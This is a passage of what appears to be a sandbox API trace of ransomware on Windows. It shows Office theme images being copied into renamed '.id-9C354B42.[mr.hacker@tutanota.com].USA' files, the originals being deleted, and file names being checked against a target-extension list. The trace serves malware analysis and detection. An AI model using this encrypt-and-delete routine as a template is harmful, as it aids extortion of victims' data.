SetEndOfFile (hFile=0x210) returned 1 [0043.632] CloseHandle (hObject=0x210) returned 1 [0043.633] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0043.633] SetEndOfFile (hFile=0x20c) returned 1 [0043.634] CloseHandle (hObject=0x20c) returned 1 [0043.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0043.634] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 1 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.634] lstrlenW (lpString=".doc") returned 4 [0043.634] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.634] lstrlenW (lpString=".docx") returned 5 [0043.634] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.634] lstrlenW (lpString=".pdf") returned 4 [0043.634] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.634] lstrlenW (lpString=".xls") returned 4 [0043.634] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.634] lstrlenW (lpString=".xlsx") returned 5 [0043.634] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.634] lstrlenW (lpString=".ppt") returned 4 [0043.634] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.634] lstrlenW (lpString=".zip") returned 4 [0043.634] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.634] lstrlenW (lpString=".rar") returned 4 [0043.635] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.635] lstrlenW (lpString=".bz2") returned 4 [0043.635] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.635] lstrlenW (lpString=".7z") returned 3 [0043.635] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.635] lstrlenW (lpString=".dbf") returned 4 [0043.635] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.635] lstrlenW (lpString=".1cd") returned 4 [0043.635] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.635] lstrlenW (lpString=".jpg") returned 4 [0043.635] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.635] lstrlenW (lpString=".doc") returned 4 [0043.635] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.635] lstrlenW (lpString=".docx") returned 5 [0043.635] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.635] lstrlenW (lpString=".pdf") returned 4 [0043.635] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.635] lstrlenW (lpString=".xls") returned 4 [0043.635] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.635] lstrlenW (lpString=".xlsx") returned 5 [0043.635] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.635] lstrlenW (lpString=".ppt") returned 4 [0043.635] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.635] lstrlenW (lpString=".zip") returned 4 [0043.635] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.635] lstrlenW (lpString=".rar") returned 4 [0043.635] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.635] lstrlenW (lpString=".bz2") returned 4 [0043.636] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.636] lstrlenW (lpString=".7z") returned 3 [0043.636] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.636] lstrlenW (lpString=".dbf") returned 4 [0043.636] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.636] lstrlenW (lpString=".1cd") returned 4 [0043.636] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.636] lstrlenW (lpString=".jpg") returned 4 [0043.636] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.636] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0043.636] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.897] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=20627) returned 1 [0044.897] CloseHandle (hObject=0x208) returned 1 [0044.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 0x20 [0044.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.897] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.897] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.898] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.898] GetLastError () returned 0x0 [0044.898] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x5093, lpOverlapped=0x0) returned 1 [0044.902] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x50a0, lpOverlapped=0x0) returned 1 [0044.903] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0044.903] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.903] SetEndOfFile (hFile=0x200) returned 1 [0044.903] CloseHandle (hObject=0x200) returned 1 [0044.904] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.904] SetEndOfFile (hFile=0x208) returned 1 [0044.905] CloseHandle (hObject=0x208) returned 1 [0044.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.905] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 1 [0044.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.905] lstrlenW (lpString=".doc") returned 4 [0044.905] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.905] lstrlenW (lpString=".docx") returned 5 [0044.906] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.906] lstrlenW (lpString=".pdf") returned 4 [0044.906] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString=".xls") returned 4 [0044.906] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString=".xlsx") returned 5 [0044.906] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.906] lstrlenW (lpString=".ppt") returned 4 [0044.906] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.906] lstrlenW (lpString=".zip") returned 4 [0044.906] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString=".rar") returned 4 [0044.906] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.906] lstrlenW (lpString=".bz2") returned 4 [0044.906] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString=".7z") returned 3 [0044.906] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.906] lstrlenW (lpString=".dbf") returned 4 [0044.906] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.906] lstrlenW (lpString=".1cd") returned 4 [0044.906] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.906] lstrlenW (lpString=".jpg") returned 4 [0044.906] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.906] lstrlenW (lpString=".doc") returned 4 [0044.906] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.906] lstrlenW (lpString=".docx") returned 5 [0044.906] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.906] lstrlenW (lpString=".pdf") returned 4 [0044.906] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString=".xls") returned 4 [0044.907] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString=".xlsx") returned 5 [0044.907] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.907] lstrlenW (lpString=".ppt") returned 4 [0044.907] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.907] lstrlenW (lpString=".zip") returned 4 [0044.907] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString=".rar") returned 4 [0044.907] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.907] lstrlenW (lpString=".bz2") returned 4 [0044.907] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString=".7z") returned 3 [0044.907] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.907] lstrlenW (lpString=".dbf") returned 4 [0044.907] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.907] lstrlenW (lpString=".1cd") returned 4 [0044.907] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0044.907] lstrlenW (lpString=".jpg") returned 4 [0044.907] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.907] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0044.907] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.908] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=3479) returned 1 [0044.908] CloseHandle (hObject=0x208) returned 1 [0044.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 0x20 [0044.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.908] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.908] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.910] GetLastError () returned 0x0 [0044.910] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xd97, lpOverlapped=0x0) returned 1 [0044.911] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xda0, lpOverlapped=0x0) returned 1 [0044.912] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0044.912] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.913] SetEndOfFile (hFile=0x200) returned 1 [0044.913] CloseHandle (hObject=0x200) returned 1 [0044.913] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.913] SetEndOfFile (hFile=0x208) returned 1 [0044.914] CloseHandle (hObject=0x208) returned 1 [0044.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.914] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 1 [0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString=".doc") returned 4 [0044.915] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.915] lstrlenW (lpString=".docx") returned 5 [0044.915] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.915] lstrlenW (lpString=".pdf") returned 4 [0044.915] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.915] lstrlenW (lpString=".xls") returned 4 [0044.915] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.915] lstrlenW (lpString=".xlsx") returned 5 [0044.915] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.915] lstrlenW (lpString=".ppt") returned 4 [0044.915] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString=".zip") returned 4 [0044.915] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.915] lstrlenW (lpString=".rar") returned 4 [0044.915] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.915] lstrlenW (lpString=".bz2") returned 4 [0044.915] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.915] lstrlenW (lpString=".7z") returned 3 [0044.915] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString=".dbf") returned 4 [0044.915] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString=".1cd") returned 4 [0044.915] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString=".jpg") returned 4 [0044.915] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.915] lstrlenW (lpString=".doc") returned 4 [0044.915] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.915] lstrlenW (lpString=".docx") returned 5 [0044.916] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.916] lstrlenW (lpString=".pdf") returned 4 [0044.916] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.916] lstrlenW (lpString=".xls") returned 4 [0044.916] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.916] lstrlenW (lpString=".xlsx") returned 5 [0044.916] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.916] lstrlenW (lpString=".ppt") returned 4 [0044.916] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.916] lstrlenW (lpString=".zip") returned 4 [0044.916] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.916] lstrlenW (lpString=".rar") returned 4 [0044.916] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.916] lstrlenW (lpString=".bz2") returned 4 [0044.916] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.916] lstrlenW (lpString=".7z") returned 3 [0044.916] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.916] lstrlenW (lpString=".dbf") returned 4 [0044.916] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.916] lstrlenW (lpString=".1cd") returned 4 [0044.916] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.916] lstrlenW (lpString=".jpg") returned 4 [0044.916] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.916] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0044.916] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.917] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=31837) returned 1 [0044.917] CloseHandle (hObject=0x208) returned 1 [0044.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 0x20 [0044.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.917] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.917] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.917] GetLastError () returned 0x0 [0044.917] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x7c5d, lpOverlapped=0x0) returned 1 [0044.919] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x7c60, lpOverlapped=0x0) returned 1 [0044.921] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0044.921] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, 